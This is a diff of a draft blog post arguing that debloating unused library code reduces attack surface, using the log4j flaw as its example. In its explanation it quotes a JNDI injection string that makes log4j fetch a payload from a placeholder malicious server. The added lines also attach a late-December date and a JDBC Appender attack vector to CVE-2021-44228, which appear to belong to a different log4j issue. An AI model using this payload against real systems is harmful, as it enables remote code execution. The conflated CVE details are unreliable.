cesarsotovalero/cesarsotovalero.github.io/_posts/2022/2022-06-15-why-debloating-software-based-on-user-usage.md

 image: ../img/posts/2022/2022-06-15/satyr-cover.jpg
 share-img: ../img/posts/2022/2022-06-15/satyr-cover.jpg
 show-avatar: false
+toc: true
 date: 2022/06/15
 author: cesarsotovalero
 published: false
 ---

-TODO
+Most software applications are built using third-party libraries and frameworks that together form the application's [software supply chain](../blog/the-software-supply-chain.html).
+These libraries are often large and complex pieces of engineering, with many features and functionalities to support a wide range of use cases.
+Consequently, most applications only use a small subset of these features.
+This means that the majority of the code in these libraries is unnecessary for the application's functionality.
+This excess of code can be a security risk, as it can contain dormant vulnerabilities that can be exploited.
+This article explores the benefits of [debloating software based on user usage](../blog/diversity-driven-software-debloat.html), and how it can help reduce the attack surface of applications.
+With a focus on the recent log4j security vulnerability, let's discuss how debloating could have mitigated the impact of such incident.

 <figure class="jb_picture">
   {% responsive_image path: img/posts/2022/2022-06-15/satyr.jpg alt:"TODO" %}
   <figcaption class="stroke">
-    &#169; Let's .
-Photo from a wooden satyr at <a href="https://goo.gl/maps/9SCooHLsZwRLTcbt6">Stockholms Centralstation</a>.
+    &#169; Let's reuse code, sit, sing, and hope for the best.
+Photo from a wooden satyr in <a href="https://goo.gl/maps/EjhcQKd9rBBfUTu48">Stockholm City Museum</a>.
   </figcaption>
 </figure>

 # The Log4j Vulnerability

-In December 2021, a critical vulnerability was discovered in the popular Java logging library log4j2.
+In December 29th 2021, a critical vulnerability was discovered in the popular Java logging library log4j2.
+An attacker with permission to modify the logging configuration file can construct a malicious configuration using a JDBC Appender with a data source referencing a JNDI URI which can execute remote code.
 The versions affected ranged [between 2.0-beta9 and 2.14.1 included](https://github.com/advisories/GHSA-jfh8-c2jp-5v3q).
 This vulnerability is identified by [CVE-2021-44228](https://nvd.nist.gov/vuln/detail/CVE-2021-44228).

 The vulnerability stemmed from the `JndiLookup` class in log4j, which allowed JNDI ([Java Naming and Directory Interface](https://docs.oracle.com/javase/tutorial/jndi/overview/index.html#:~:text=The%20Java%20Naming%20and%20Directory,any%20specific%20directory%20service%20implementation.)) lookups.
 When log4j is configured to log unsanitized user input, an attacker can insert a malicious string (like `${jndi:ldap://malicious.server/payload}`) which would cause log4j to initiate a JNDI lookup.